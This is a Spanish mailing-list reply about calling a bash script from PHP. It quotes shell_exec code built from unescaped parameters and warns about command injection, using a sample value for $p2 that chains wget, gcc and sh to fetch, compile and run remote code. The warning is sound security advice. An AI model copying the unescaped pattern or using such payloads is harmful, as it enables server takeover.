[eside-ghost] String demasiados largos desde php a shell bash

[ALi]

On 4/2/08, Fran Mosteiro <framosval en gmail.com> wrote:
> Buenas!
> ALi..... acabo de enamorarme de ti por cmpleto (ehehehehe, en sentido
> figurado eh! xDDDD). Lo he puesto como me comentabas:
> shell_exec("newSearch.sh $p1 $p2 $p3 $p4 $p5 $p6 $p7 $p8 '$p9'") ... con las
> comillas en '$9' y va como un tiro.
>  Muchisimas gracias!!!!
>
> PD: en realidad el exec es:
> $query = "newSearch.sh $p1 $p2 $p3 $p4 $p5 $p6 $p7 $p8 '$p9'";
> shell_exec($query); // :P

Yo tambien te quiero, pero me dices en que servidor vas a poner eso?
xk sigues sin escapar los parametros ...... txipi me da que
amablamente te dice como escapar eso en php, yo no lo se .....
supongamos que en $p2 te ponen "param2;wget http://exploit;gcc exploit
-o kk;sh ./kk;" y si luego se conectan a la maquina .....
nunca esta de mas en pensar como un paranoico :S


Saludos